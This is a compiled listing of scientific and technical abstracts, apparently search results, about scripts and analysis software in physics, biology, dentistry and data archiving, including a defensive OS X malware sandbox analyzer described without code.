The Linac Coherent Light Source (LCLS) is required to deliver a high quality electron beam for producing coherent X-rays. As a result, high resolution beam position monitoring is required. The Beam Position Monitor (BPM) digitizer acquires analog signals from the beam line and digitizes them to obtain beam position data. Although Matlab is currently being used to test the BPM digitizer?s functions and capability, the Controls Department at SLAC prefers to use Experimental Physics and Industrial Control Systems (EPICS). This paper discusses the transition of providing similar as well as enhanced functionalities, than those offered by Matlab, to test themore » digitizer. Altogether, the improved test stand development system can perform mathematical and statistical calculations with the waveform signals acquired from the digitizer and compute the fast Fourier transform (FFT) of the signals. Finally, logging of meaningful data into files has been added.« less
Analysis of the possibility of a PGA309 integrated circuit application in pressure sensors
NASA Astrophysics Data System (ADS)
Walendziuk, Wojciech; Baczewski, Michal; Idzkowski, Adam
2016-09-01
This article present the results of research concerning the analysis of the possibilities of applying a PGA309 integrated circuit in transducers used for pressure measurement. The experiments were done with the use of a PGA309EVM-USB evaluation circuit with a BD|SENSORS pressure sensor. A specially prepared MATLAB script was used in the process of the calibration setting choice and the results analysis. The article discusses the worked out algorithm that processes the measurement results, i.e. the algorithm which calculates the desired gain and the offset adjustment voltage of the transducer measurement bridge in relation to the input signal range of the integrated circuit and the temperature of the environment (temperature compensation). The checking procedure was conducted in a measurement laboratory and the obtained result were analyzed and discussed.
NASA Astrophysics Data System (ADS)
Borsányi, Sz.; Endrődi, G.; Fodor, Z.; Katz, S. D.; Krieg, S.; Ratti, C.; Szabó, K. K.
2012-08-01
We determine the equation of state of QCD for nonzero chemical potentials via a Taylor expansion of the pressure. The results are obtained for N f = 2 + 1 flavors of quarks with physical masses, on various lattice spacings. We present results for the pressure, interaction measure, energy density, entropy density, and the speed of sound for small chemical potentials. At low temperatures we compare our results with the Hadron Resonance Gas model. We also express our observables along trajectories of constant entropy over particle number. A simple parameterization is given (the Matlab/Octave script parameterization.m, submitted to the arXiv along with the paper), which can be used to reconstruct the observables as functions of T and μ, or as functions of T and S/N.
Real-time quantitative Schlieren imaging by fast Fourier demodulation of a checkered backdrop
NASA Astrophysics Data System (ADS)
Wildeman, Sander
2018-06-01
A quantitative synthetic Schlieren imaging (SSI) method based on fast Fourier demodulation is presented. Instead of a random dot pattern (as usually employed in SSI), a 2D periodic pattern (such as a checkerboard) is used as a backdrop to the refractive object of interest. The range of validity and accuracy of this "Fast Checkerboard Demodulation" (FCD) method are assessed using both synthetic data and experimental recordings of patterns optically distorted by small waves on a water surface. It is found that the FCD method is at least as accurate as sophisticated, multi-stage, digital image correlation (DIC) or optical flow (OF) techniques used with random dot patterns, and it is significantly faster. Efficient, fully vectorized, implementations of both the FCD and DIC/OF schemes developed for this study are made available as open source Matlab scripts.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Harvey, Dustin Yewell
This document is a white paper marketing proposal for Echo™ is a data analysis platform designed for efficient, robust, and scalable creation and execution of complex workflows. Echo’s analysis management system refers to the ability to track, understand, and reproduce workflows used for arriving at results and decisions. Echo improves on traditional scripted data analysis in MATLAB, Python, R, and other languages to allow analysts to make better use of their time. Additionally, the Echo platform provides a powerful data management and curation solution allowing analysts to quickly find, access, and consume datasets. After two years of development and amore » first release in early 2016, Echo is now available for use with many data types in a wide range of application domains. Echo provides tools that allow users to focus on data analysis and decisions with confidence that results are reported accurately.« less
Nguyen, Quoc-Thang; Miledi, Ricardo
2003-09-30
Current computer programs for intracellular recordings often lack advanced data management, are usually incompatible with other applications and are also difficult to adapt to new experiments. We have addressed these shortcomings in e-Phys, a suite of electrophysiology applications for intracellular recordings. The programs in e-Phys use Component Object Model (COM) technologies available in the Microsoft Windows operating system to provide enhanced data storage, increased interoperability between e-Phys and other COM-aware applications, and easy customization of data acquisition and analysis thanks to a script-based integrated programming environment. Data files are extensible, hierarchically organized and integrated in the Windows shell by using the Structured Storage technology. Data transfers to and from other programs are facilitated by implementing the ActiveX Automation standard and distributed COM (DCOM). ActiveX Scripting allows experimenters to write their own event-driven acquisition and analysis programs in the VBScript language from within e-Phys. Scripts can reuse components available from other programs on other machines to create distributed meta-applications. This paper describes the main features of e-Phys and how this package was used to determine the effect of the atypical antipsychotic drug clozapine on synaptic transmission at the neuromuscular junction.
RBSE: Product development team research activity deliverables
NASA Technical Reports Server (NTRS)
1992-01-01
The GHG Functions and Extensions to be added to the NASA Electronic Library System (NELS) 1.1 product are described. These functions will implement the 'output request' capability within the Object Browser. The functions will be implemented in two parts. The first part is a code to be added to the Object Browser (X version) to implement menus allowing the user to request that objects be copied to specific media, or that objects be downloaded to the user's system following a specific protocol, or that the object be printed to one of the printers attached to the host system. The second part is shell scripts which support the various menu selections. Additional scripts to support functions within the GHG shell (X version) will also be created along with the X version of the GHG Shell as initial capability for the 27 Mar. prototype. The scripts will be composed of C shell routines that will accept parameters (primary file pathways). Certain limitations in functionality will invoke Mail instead of Oracle Mail since that has yet to be delivered and the NELS invocation will default to the X-Windows version instead of the ASCII version.
jsNMR: an embedded platform-independent NMR spectrum viewer.
Vosegaard, Thomas
2015-04-01
jsNMR is a lightweight NMR spectrum viewer written in JavaScript/HyperText Markup Language (HTML), which provides a cross-platform spectrum visualizer that runs on all computer architectures including mobile devices. Experimental (and simulated) datasets are easily opened in jsNMR by (i) drag and drop on a jsNMR browser window, (ii) by preparing a jsNMR file from the jsNMR web site, or (iii) by mailing the raw data to the jsNMR web portal. jsNMR embeds the original data in the HTML file, so a jsNMR file is a self-transforming dataset that may be exported to various formats, e.g. comma-separated values. The main applications of jsNMR are to provide easy access to NMR data without the need for dedicated software installed and to provide the possibility to visualize NMR spectra on web sites. Copyright © 2015 John Wiley & Sons, Ltd.
Efficient simulation of intrinsic, extrinsic and external noise in biochemical systems.
Pischel, Dennis; Sundmacher, Kai; Flassig, Robert J
2017-07-15
Biological cells operate in a noisy regime influenced by intrinsic, extrinsic and external noise, which leads to large differences of individual cell states. Stochastic effects must be taken into account to characterize biochemical kinetics accurately. Since the exact solution of the chemical master equation, which governs the underlying stochastic process, cannot be derived for most biochemical systems, approximate methods are used to obtain a solution. In this study, a method to efficiently simulate the various sources of noise simultaneously is proposed and benchmarked on several examples. The method relies on the combination of the sigma point approach to describe extrinsic and external variability and the τ -leaping algorithm to account for the stochasticity due to probabilistic reactions. The comparison of our method to extensive Monte Carlo calculations demonstrates an immense computational advantage while losing an acceptable amount of accuracy. Additionally, the application to parameter optimization problems in stochastic biochemical reaction networks is shown, which is rarely applied due to its huge computational burden. To give further insight, a MATLAB script is provided including the proposed method applied to a simple toy example of gene expression. MATLAB code is available at Bioinformatics online. flassig@mpi-magdeburg.mpg.de. Supplementary data are available at Bioinformatics online. © The Author 2017. Published by Oxford University Press. All rights reserved. For Permissions, please e-mail: journals.permissions@oup.com
NASA Technical Reports Server (NTRS)
Brenner, Richard; Lala, Jaynarayan H.; Nagle, Gail A.; Schor, Andrei; Turkovich, John
1994-01-01
This program demonstrated the integration of a number of technologies that can increase the availability and reliability of launch vehicles while lowering costs. Availability is increased with an advanced guidance algorithm that adapts trajectories in real-time. Reliability is increased with fault-tolerant computers and communication protocols. Costs are reduced by automatically generating code and documentation. This program was realized through the cooperative efforts of academia, industry, and government. The NASA-LaRC coordinated the effort, while Draper performed the integration. Georgia Institute of Technology supplied a weak Hamiltonian finite element method for optimal control problems. Martin Marietta used MATLAB to apply this method to a launch vehicle (FENOC). Draper supplied the fault-tolerant computing and software automation technology. The fault-tolerant technology includes sequential and parallel fault-tolerant processors (FTP & FTPP) and authentication protocols (AP) for communication. Fault-tolerant technology was incrementally incorporated. Development culminated with a heterogeneous network of workstations and fault-tolerant computers using AP. Draper's software automation system, ASTER, was used to specify a static guidance system based on FENOC, navigation, flight control (GN&C), models, and the interface to a user interface for mission control. ASTER generated Ada code for GN&C and C code for models. An algebraic transform engine (ATE) was developed to automatically translate MATLAB scripts into ASTER.
Analyzed DTS Data, Guelph, ON Canada
Coleman, Thomas
2015-07-01
Analyzed DTS datasets from active heat injection experiments in Guelph, ON Canada is included. A .pdf file of images including borehole temperature distributions, temperature difference distributions, temperature profiles, and flow interpretations is included as the primary analyzed dataset. Analyzed data used to create the .pdf images are included as a matlab data file that contains the following 5 types of data: 1) Borehole Temperature (matrix of temperature data collected in the borehole), 2) Borehole Temperature Difference (matrix of temperature difference above ambient for each test), 3) Borehole Time (time in both min and sec since the start of a DTS test), 4) Borehole Depth (channel depth locations for the DTS measurements), 5) Temperature Profiles (ambient, active, active off early time, active off late time, and injection).
VESL: The Virtual Earth Sheet Laboratory for Ice Sheet Modeling and Visualization
NASA Astrophysics Data System (ADS)
Cheng, D. L. C.; Larour, E. Y.; Quinn, J. D.; Halkides, D. J.
2017-12-01
We present the Virtual Earth System Laboratory (VESL), a scientific modeling and visualization tool delivered through an integrated web portal. This allows for the dissemination of data, simulation of physical processes, and promotion of climate literacy. The current iteration leverages NASA's Ice Sheet System Model (ISSM), a state-of-the-art polar ice sheet dynamics model developed at the Jet Propulsion Lab and UC Irvine. We utilize the Emscripten source-to-source compiler to convert the C/C++ ISSM engine core to JavaScript, and bundled pre/post-processing JS scripts to be compatible with the existing ISSM Python/Matlab API. Researchers using VESL will be able to effectively present their work for public dissemination with little-to-no additional post-processing. Moreover, the portal allows for real time visualization and editing of models, cloud based computational simulation, and downloads of relevant data. This allows for faster publication in peer-reviewed journals and adaption of results for educational applications. Through application of this concept to multiple aspects of the Earth System, VESL is able to broaden data applications in the geosciences and beyond. At this stage, we still seek feedback from the greater scientific and public outreach communities regarding the ease of use and feature set of VESL. As we plan its expansion, we aim to achieve more rapid communication and presentation of scientific results.
RGG: A general GUI Framework for R scripts
Visne, Ilhami; Dilaveroglu, Erkan; Vierlinger, Klemens; Lauss, Martin; Yildiz, Ahmet; Weinhaeusel, Andreas; Noehammer, Christa; Leisch, Friedrich; Kriegner, Albert
2009-01-01
Background R is the leading open source statistics software with a vast number of biostatistical and bioinformatical analysis packages. To exploit the advantages of R, extensive scripting/programming skills are required. Results We have developed a software tool called R GUI Generator (RGG) which enables the easy generation of Graphical User Interfaces (GUIs) for the programming language R by adding a few Extensible Markup Language (XML) – tags. RGG consists of an XML-based GUI definition language and a Java-based GUI engine. GUIs are generated in runtime from defined GUI tags that are embedded into the R script. User-GUI input is returned to the R code and replaces the XML-tags. RGG files can be developed using any text editor. The current version of RGG is available as a stand-alone software (RGGRunner) and as a plug-in for JGR. Conclusion RGG is a general GUI framework for R that has the potential to introduce R statistics (R packages, built-in functions and scripts) to users with limited programming skills and helps to bridge the gap between R developers and GUI-dependent users. RGG aims to abstract the GUI development from individual GUI toolkits by using an XML-based GUI definition language. Thus RGG can be easily integrated in any software. The RGG project further includes the development of a web-based repository for RGG-GUIs. RGG is an open source project licensed under the Lesser General Public License (LGPL) and can be downloaded freely at PMID:19254356
Root canal anatomy preservation of WaveOne reciprocating files with or without glide path.
Berutti, Elio; Paolino, Davide Salvatore; Chiandussi, Giorgio; Alovisi, Mario; Cantatore, Giuseppe; Castellucci, Arnaldo; Pasqualini, Damiano
2012-01-01
This study evaluated the influence of glide path on canal curvature and axis modification after instrumentation with WaveOne Primary reciprocating files. Thirty ISO 15, 0.02 taper Endo Training Blocks were used. In group 1, glide path was created with PathFile 1, 2, and 3 at working length, whereas in group 2, glide path was not performed. In both groups, canals were shaped with WaveOne Primary reciprocating files at working length. Preinstrumentation and postinstrumentation digital images were superimposed and processed with Matlab r2010b software to analyze the curvature radius ratio (CRr) and the relative axis error (rAe), representing canal curvature modification. Data were analyzed with 1-way balanced analyses of variance at 2 levels (P < .05). Glide path was found to be extremely significant for both CRr parameter (F = 9.59; df = 1; P = .004) and rAe parameter (F = 13.55; df = 1; P = .001). Canal modifications seem to be significantly reduced when previous glide path is performed by using the new WaveOne nickel-titanium single-file system. Copyright © 2012 American Association of Endodontists. Published by Elsevier Inc. All rights reserved.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Walkup, Elizabeth
This software is an analyzer for automated sandbox analysis of malware on the OS X operating system. It runs inside an OS X virtual machine to collect data about what happens when a given file is opened or run. As of August 2014, there was no sandbox software for Mac OS X malware, as it requires different methods from those used on the Windows OS (which most sandboxes are written for). This software adds OS X analysis capabilities to an existing open-source sandbox, Cuckoo Sandbox (http://cuckoosandbox.org/), which previously only worked for Windows. The analyzer itself can take many different typesmore » of files as input: the traditional Mach-O and FAT executables, .app files, zip files, Python scripts, Java archives, and web pages, as well as PDFs and other documents. While the file is running, the analyzer also simulates rudimentary human interaction with clicks and mouse movements in order to bypass the tests some malware use to see if they are being analyzed. The analyzer outputs several different kinds of data: function call traces, network captures, screenshots, and all created and modified files. This work also includes a static analysis Cuckoo module for Mach-O binary files. It extracts file structures, code library imports and exports, and signatures. This data can be used along with the analyzer results to create signatures for malware.« less
Jain, Niharika; Pawar, Ajinkya M.; Ukey, Piyush D.; Jain, Prashant K.; Thakur, Bhagyashree; Gupta, Abhishek
2017-01-01
Objectives: To compare the relative axis modification and canal concentricity after glide path preparation with 20/0.02 hand K-file (NITIFLEX®) and 20/0.04 rotary file (HyFlex™ CM) with subsequent instrumentation with 1.5 mm self-adjusting file (SAF). Materials and Methods: One hundred and twenty ISO 15, 0.02 taper, Endo Training Blocks (Dentsply Maillefer, Ballaigues, Switzerland) were acquired and randomly divided into following two groups (n = 60): group 1, establishing glide path till 20/0.02 hand K-file (NITIFLEX®) followed by instrumentation with 1.5 mm SAF; and Group 2, establishing glide path till 20/0.04 rotary file (HyFlex™ CM) followed by instrumentation with 1.5 mm SAF. Pre- and post-instrumentation digital images were processed with MATLAB R 2013 software to identify the central axis, and then superimposed using digital imaging software (Picasa 3.0 software, Google Inc., California, USA) taking five landmarks as reference points. Student's t-test for pairwise comparisons was applied with the level of significance set at 0.05. Results: Training blocks instrumented with 20/0.04 rotary file and SAF were associated less deviation in canal axis (at all the five marked points), representing better canal concentricity compared to those, in which glide path was established by 20/0.02 hand K-files followed by SAF instrumentation. Conclusion: Canal geometry is better maintained after SAF instrumentation with a prior glide path established with 20/0.04 rotary file. PMID:28855752
UAV Swarm Tactics: An Agent-Based Simulation and Markov Process Analysis
2013-06-01
CRN Common Random Numbers CSV Comma Separated Values DoE Design of Experiment GLM Generalized Linear Model HVT High Value Target JAR Java ARchive JMF... Java Media Framework JRE Java runtime environment Mason Multi-Agent Simulator Of Networks MOE Measure Of Effectiveness MOP Measures Of Performance...with every set several times, and to write a CSV file with the results. Rather than scripting the agent behavior deterministically, the agents should
Information Security Considerations for Applications Using Apache Accumulo
2014-09-01
Distributed File System INSCOM United States Army Intelligence and Security Command JPA Java Persistence API JSON JavaScript Object Notation MAC Mandatory... MySQL [13]. BigTable can process 20 petabytes per day [14]. High degree of scalability on commodity hardware. NoSQL databases do not rely on highly...manipulation in relational databases. NoSQL databases each have a unique programming interface that uses a lower level procedural language (e.g., Java
The NCAR Research Data Archive's Hybrid Approach for Data Discovery and Access
NASA Astrophysics Data System (ADS)
Schuster, D.; Worley, S. J.
2013-12-01
The NCAR Research Data Archive (RDA http://rda.ucar.edu) maintains a variety of data discovery and access capabilities for it's 600+ dataset collections to support the varying needs of a diverse user community. In-house developed and standards-based community tools offer services to more than 10,000 users annually. By number of users the largest group is external and access the RDA through web based protocols; the internal NCAR HPC users are fewer in number, but typically access more data volume. This paper will detail the data discovery and access services maintained by the RDA to support both user groups, and show metrics that illustrate how the community is using the services. The distributed search capability enabled by standards-based community tools, such as Geoportal and an OAI-PMH access point that serves multiple metadata standards, provide pathways for external users to initially discover RDA holdings. From here, in-house developed web interfaces leverage primary discovery level metadata databases that support keyword and faceted searches. Internal NCAR HPC users, or those familiar with the RDA, may go directly to the dataset collection of interest and refine their search based on rich file collection metadata. Multiple levels of metadata have proven to be invaluable for discovery within terabyte-sized archives composed of many atmospheric or oceanic levels, hundreds of parameters, and often numerous grid and time resolutions. Once users find the data they want, their access needs may vary as well. A THREDDS data server running on targeted dataset collections enables remote file access through OPENDAP and other web based protocols primarily for external users. In-house developed tools give all users the capability to submit data subset extraction and format conversion requests through scalable, HPC based delayed mode batch processing. Users can monitor their RDA-based data processing progress and receive instructions on how to access the data when it is ready. External users are provided with RDA server generated scripts to download the resulting request output. Similarly they can download native dataset collection files or partial files using Wget or cURL based scripts supplied by the RDA server. Internal users can access the resulting request output or native dataset collection files directly from centralized file systems.
Standardization of pitch-range settings in voice acoustic analysis.
Vogel, Adam P; Maruff, Paul; Snyder, Peter J; Mundt, James C
2009-05-01
Voice acoustic analysis is typically a labor-intensive, time-consuming process that requires the application of idiosyncratic parameters tailored to individual aspects of the speech signal. Such processes limit the efficiency and utility of voice analysis in clinical practice as well as in applied research and development. In the present study, we analyzed 1,120 voice files, using standard techniques (case-by-case hand analysis), taking roughly 10 work weeks of personnel time to complete. The results were compared with the analytic output of several automated analysis scripts that made use of preset pitch-range parameters. After pitch windows were selected to appropriately account for sex differences, the automated analysis scripts reduced processing time of the 1,120 speech samples to less than 2.5 h and produced results comparable to those obtained with hand analysis. However, caution should be exercised when applying the suggested preset values to pathological voice populations.
Advances in Software Tools for Pre-processing and Post-processing of Overset Grid Computations
NASA Technical Reports Server (NTRS)
Chan, William M.
2004-01-01
Recent developments in three pieces of software for performing pre-processing and post-processing work on numerical computations using overset grids are presented. The first is the OVERGRID graphical interface which provides a unified environment for the visualization, manipulation, generation and diagnostics of geometry and grids. Modules are also available for automatic boundary conditions detection, flow solver input preparation, multiple component dynamics input preparation and dynamics animation, simple solution viewing for moving components, and debris trajectory analysis input preparation. The second is a grid generation script library that enables rapid creation of grid generation scripts. A sample of recent applications will be described. The third is the OVERPLOT graphical interface for displaying and analyzing history files generated by the flow solver. Data displayed include residuals, component forces and moments, number of supersonic and reverse flow points, and various dynamics parameters.
New web technologies for astronomy
NASA Astrophysics Data System (ADS)
Sprimont, P.-G.; Ricci, D.; Nicastro, L.
2014-12-01
Thanks to the new HTML5 capabilities and the huge improvements of the JavaScript language, it is now possible to design very complex and interactive web user interfaces. On top of that, the once monolithic and file-server oriented web servers are evolving into easily programmable server applications capable to cope with the complex interactions made possible by the new generation of browsers. We believe that the whole community of amateur and professionals astronomers can benefit from the potential of these new technologies. New web interfaces can be designed to provide the user with a large deal of much more intuitive and interactive tools. Accessing astronomical data archives, schedule, control and monitor observatories, and in particular robotic telescopes, supervising data reduction pipelines, all are capabilities that can now be implemented in a JavaScript web application. In this paper we describe the Sadira package we are implementing exactly to this aim.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Staley, Martin
2017-09-20
This high-performance ray tracing library provides very fast rendering; compact code; type flexibility through C++ "generic programming" techniques; and ease of use via an application programming interface (API) that operates independently of any GUI, on-screen display, or other enclosing application. Kip supports constructive solid geometry (CSG) models based on a wide variety of built-in shapes and logical operators, and also allows for user-defined shapes and operators to be provided. Additional features include basic texturing; input/output of models using a simple human-readable file format and with full error checking and detailed diagnostics; and support for shared data parallelism. Kip is writtenmore » in pure, ANSI standard C++; is entirely platform independent; and is very easy to use. As a C++ "header only" library, it requires no build system, configuration or installation scripts, wizards, non-C++ preprocessing, makefiles, shell scripts, or external libraries.« less
Muir, Dylan R; Kampa, Björn M
2014-01-01
Two-photon calcium imaging of neuronal responses is an increasingly accessible technology for probing population responses in cortex at single cell resolution, and with reasonable and improving temporal resolution. However, analysis of two-photon data is usually performed using ad-hoc solutions. To date, no publicly available software exists for straightforward analysis of stimulus-triggered two-photon imaging experiments. In addition, the increasing data rates of two-photon acquisition systems imply increasing cost of computing hardware required for in-memory analysis. Here we present a Matlab toolbox, FocusStack, for simple and efficient analysis of two-photon calcium imaging stacks on consumer-level hardware, with minimal memory footprint. We also present a Matlab toolbox, StimServer, for generation and sequencing of visual stimuli, designed to be triggered over a network link from a two-photon acquisition system. FocusStack is compatible out of the box with several existing two-photon acquisition systems, and is simple to adapt to arbitrary binary file formats. Analysis tools such as stack alignment for movement correction, automated cell detection and peri-stimulus time histograms are already provided, and further tools can be easily incorporated. Both packages are available as publicly-accessible source-code repositories.
Alcalá-Quintana, Rocío; García-Pérez, Miguel A
2013-12-01
Research on temporal-order perception uses temporal-order judgment (TOJ) tasks or synchrony judgment (SJ) tasks in their binary SJ2 or ternary SJ3 variants. In all cases, two stimuli are presented with some temporal delay, and observers judge the order of presentation. Arbitrary psychometric functions are typically fitted to obtain performance measures such as sensitivity or the point of subjective simultaneity, but the parameters of these functions are uninterpretable. We describe routines in MATLAB and R that fit model-based functions whose parameters are interpretable in terms of the processes underlying temporal-order and simultaneity judgments and responses. These functions arise from an independent-channels model assuming arrival latencies with exponential distributions and a trichotomous decision space. Different routines fit data separately for SJ2, SJ3, and TOJ tasks, jointly for any two tasks, or also jointly for the three tasks (for common cases in which two or even the three tasks were used with the same stimuli and participants). Additional routines provide bootstrap p-values and confidence intervals for estimated parameters. A further routine is included that obtains performance measures from the fitted functions. An R package for Windows and source code of the MATLAB and R routines are available as Supplementary Files.
Muir, Dylan R.; Kampa, Björn M.
2015-01-01
Two-photon calcium imaging of neuronal responses is an increasingly accessible technology for probing population responses in cortex at single cell resolution, and with reasonable and improving temporal resolution. However, analysis of two-photon data is usually performed using ad-hoc solutions. To date, no publicly available software exists for straightforward analysis of stimulus-triggered two-photon imaging experiments. In addition, the increasing data rates of two-photon acquisition systems imply increasing cost of computing hardware required for in-memory analysis. Here we present a Matlab toolbox, FocusStack, for simple and efficient analysis of two-photon calcium imaging stacks on consumer-level hardware, with minimal memory footprint. We also present a Matlab toolbox, StimServer, for generation and sequencing of visual stimuli, designed to be triggered over a network link from a two-photon acquisition system. FocusStack is compatible out of the box with several existing two-photon acquisition systems, and is simple to adapt to arbitrary binary file formats. Analysis tools such as stack alignment for movement correction, automated cell detection and peri-stimulus time histograms are already provided, and further tools can be easily incorporated. Both packages are available as publicly-accessible source-code repositories1. PMID:25653614
Li, Peter; Castrillo, Juan I; Velarde, Giles; Wassink, Ingo; Soiland-Reyes, Stian; Owen, Stuart; Withers, David; Oinn, Tom; Pocock, Matthew R; Goble, Carole A; Oliver, Stephen G; Kell, Douglas B
2008-08-07
There has been a dramatic increase in the amount of quantitative data derived from the measurement of changes at different levels of biological complexity during the post-genomic era. However, there are a number of issues associated with the use of computational tools employed for the analysis of such data. For example, computational tools such as R and MATLAB require prior knowledge of their programming languages in order to implement statistical analyses on data. Combining two or more tools in an analysis may also be problematic since data may have to be manually copied and pasted between separate user interfaces for each tool. Furthermore, this transfer of data may require a reconciliation step in order for there to be interoperability between computational tools. Developments in the Taverna workflow system have enabled pipelines to be constructed and enacted for generic and ad hoc analyses of quantitative data. Here, we present an example of such a workflow involving the statistical identification of differentially-expressed genes from microarray data followed by the annotation of their relationships to cellular processes. This workflow makes use of customised maxdBrowse web services, a system that allows Taverna to query and retrieve gene expression data from the maxdLoad2 microarray database. These data are then analysed by R to identify differentially-expressed genes using the Taverna RShell processor which has been developed for invoking this tool when it has been deployed as a service using the RServe library. In addition, the workflow uses Beanshell scripts to reconcile mismatches of data between services as well as to implement a form of user interaction for selecting subsets of microarray data for analysis as part of the workflow execution. A new plugin system in the Taverna software architecture is demonstrated by the use of renderers for displaying PDF files and CSV formatted data within the Taverna workbench. Taverna can be used by data analysis experts as a generic tool for composing ad hoc analyses of quantitative data by combining the use of scripts written in the R programming language with tools exposed as services in workflows. When these workflows are shared with colleagues and the wider scientific community, they provide an approach for other scientists wanting to use tools such as R without having to learn the corresponding programming language to analyse their own data.
Li, Peter; Castrillo, Juan I; Velarde, Giles; Wassink, Ingo; Soiland-Reyes, Stian; Owen, Stuart; Withers, David; Oinn, Tom; Pocock, Matthew R; Goble, Carole A; Oliver, Stephen G; Kell, Douglas B
2008-01-01
Background There has been a dramatic increase in the amount of quantitative data derived from the measurement of changes at different levels of biological complexity during the post-genomic era. However, there are a number of issues associated with the use of computational tools employed for the analysis of such data. For example, computational tools such as R and MATLAB require prior knowledge of their programming languages in order to implement statistical analyses on data. Combining two or more tools in an analysis may also be problematic since data may have to be manually copied and pasted between separate user interfaces for each tool. Furthermore, this transfer of data may require a reconciliation step in order for there to be interoperability between computational tools. Results Developments in the Taverna workflow system have enabled pipelines to be constructed and enacted for generic and ad hoc analyses of quantitative data. Here, we present an example of such a workflow involving the statistical identification of differentially-expressed genes from microarray data followed by the annotation of their relationships to cellular processes. This workflow makes use of customised maxdBrowse web services, a system that allows Taverna to query and retrieve gene expression data from the maxdLoad2 microarray database. These data are then analysed by R to identify differentially-expressed genes using the Taverna RShell processor which has been developed for invoking this tool when it has been deployed as a service using the RServe library. In addition, the workflow uses Beanshell scripts to reconcile mismatches of data between services as well as to implement a form of user interaction for selecting subsets of microarray data for analysis as part of the workflow execution. A new plugin system in the Taverna software architecture is demonstrated by the use of renderers for displaying PDF files and CSV formatted data within the Taverna workbench. Conclusion Taverna can be used by data analysis experts as a generic tool for composing ad hoc analyses of quantitative data by combining the use of scripts written in the R programming language with tools exposed as services in workflows. When these workflows are shared with colleagues and the wider scientific community, they provide an approach for other scientists wanting to use tools such as R without having to learn the corresponding programming language to analyse their own data. PMID:18687127
Harrison, Arnell S.; Dadisman, Shawn V.; Flocks, James G.; Wiese, Dana S.; Robbins, Lisa L.
2007-01-01
In May of 2006, the U.S. Geological Survey conducted geophysical surveys offshore of Siesta Key, Florida. This report serves as an archive of unprocessed digital chirp seismic reflection data, trackline maps, navigation files, GIS information, Field Activity Collection System (FACS) logs, observer's logbook, and formal FGDC metadata. Gained digital images of the seismic profiles are also provided. The archived trace data are in standard Society of Exploration Geophysicists (SEG) SEG-Y format (Barry and others, 1975) and may be downloaded and processed with commercial or public domain software such as Seismic Unix (SU). Example SU processing scripts and USGS software for viewing the SEG-Y files (Zihlman, 1992) are also provided.
Harrison, Arnell S.; Dadisman, Shawn V.; Ferina, Nick F.; Wiese, Dana S.; Flocks, James G.
2007-01-01
In June of 2006, the U.S. Geological Survey conducted a geophysical survey offshore of Isles Dernieres, Louisiana. This report serves as an archive of unprocessed digital CHIRP seismic reflection data, trackline maps, navigation files, GIS information, Field Activity Collection System (FACS) logs, observer's logbook, and formal FGDC metadata. Gained digital images of the seismic profiles are also provided. The archived trace data are in standard Society of Exploration Geophysicists (SEG) SEG-Y format (Barry and others, 1975) and may be downloaded and processed with commercial or public domain software such as Seismic UNIX (SU). Example SU processing scripts and USGS software for viewing the SEG-Y files (Zihlman, 1992) are also provided.
morphforge: a toolbox for simulating small networks of biologically detailed neurons in Python
Hull, Michael J.; Willshaw, David J.
2014-01-01
The broad structure of a modeling study can often be explained over a cup of coffee, but converting this high-level conceptual idea into graphs of the final simulation results may require many weeks of sitting at a computer. Although models themselves can be complex, often many mental resources are wasted working around complexities of the software ecosystem such as fighting to manage files, interfacing between tools and data formats, finding mistakes in code or working out the units of variables. morphforge is a high-level, Python toolbox for building and managing simulations of small populations of multicompartmental biophysical model neurons. An entire in silico experiment, including the definition of neuronal morphologies, channel descriptions, stimuli, visualization and analysis of results can be written within a single short Python script using high-level objects. Multiple independent simulations can be created and run from a single script, allowing parameter spaces to be investigated. Consideration has been given to the reuse of both algorithmic and parameterizable components to allow both specific and stochastic parameter variations. Some other features of the toolbox include: the automatic generation of human-readable documentation (e.g., PDF files) about a simulation; the transparent handling of different biophysical units; a novel mechanism for plotting simulation results based on a system of tags; and an architecture that supports both the use of established formats for defining channels and synapses (e.g., MODL files), and the possibility to support other libraries and standards easily. We hope that this toolbox will allow scientists to quickly build simulations of multicompartmental model neurons for research and serve as a platform for further tool development. PMID:24478690
ORIGAMI Automator Primer. Automated ORIGEN Source Terms and Spent Fuel Storage Pool Analysis
DOE Office of Scientific and Technical Information (OSTI.GOV)
Wieselquist, William A.; Thompson, Adam B.; Bowman, Stephen M.
2016-04-01
Source terms and spent nuclear fuel (SNF) storage pool decay heat load analyses for operating nuclear power plants require a large number of Oak Ridge Isotope Generation and Depletion (ORIGEN) calculations. SNF source term calculations also require a significant amount of bookkeeping to track quantities such as core and assembly operating histories, spent fuel pool (SFP) residence times, heavy metal masses, and enrichments. The ORIGEN Assembly Isotopics (ORIGAMI) module in the SCALE code system provides a simple scheme for entering these data. However, given the large scope of the analysis, extensive scripting is necessary to convert formats and process datamore » to create thousands of ORIGAMI input files (one per assembly) and to process the results into formats readily usable by follow-on analysis tools. This primer describes a project within the SCALE Fulcrum graphical user interface (GUI) called ORIGAMI Automator that was developed to automate the scripting and bookkeeping in large-scale source term analyses. The ORIGAMI Automator enables the analyst to (1) easily create, view, and edit the reactor site and assembly information, (2) automatically create and run ORIGAMI inputs, and (3) analyze the results from ORIGAMI. ORIGAMI Automator uses the standard ORIGEN binary concentrations files produced by ORIGAMI, with concentrations available at all time points in each assembly’s life. The GUI plots results such as mass, concentration, activity, and decay heat using a powerful new ORIGEN Post-Processing Utility for SCALE (OPUS) GUI component. This document includes a description and user guide for the GUI, a step-by-step tutorial for a simplified scenario, and appendices that document the file structures used.« less
AgdbNet – antigen sequence database software for bacterial typing
Jolley, Keith A; Maiden, Martin CJ
2006-01-01
Background Bacterial typing schemes based on the sequences of genes encoding surface antigens require databases that provide a uniform, curated, and widely accepted nomenclature of the variants identified. Due to the differences in typing schemes, imposed by the diversity of genes targeted, creating these databases has typically required the writing of one-off code to link the database to a web interface. Here we describe agdbNet, widely applicable web database software that facilitates simultaneous BLAST querying of multiple loci using either nucleotide or peptide sequences. Results Databases are described by XML files that are parsed by a Perl CGI script. Each database can have any number of loci, which may be defined by nucleotide and/or peptide sequences. The software is currently in use on at least five public databases for the typing of Neisseria meningitidis, Campylobacter jejuni and Streptococcus equi and can be set up to query internal isolate tables or suitably-configured external isolate databases, such as those used for multilocus sequence typing. The style of the resulting website can be fully configured by modifying stylesheets and through the use of customised header and footer files that surround the output of the script. Conclusion The software provides a rapid means of setting up customised Internet antigen sequence databases. The flexible configuration options enable typing schemes with differing requirements to be accommodated. PMID:16790057
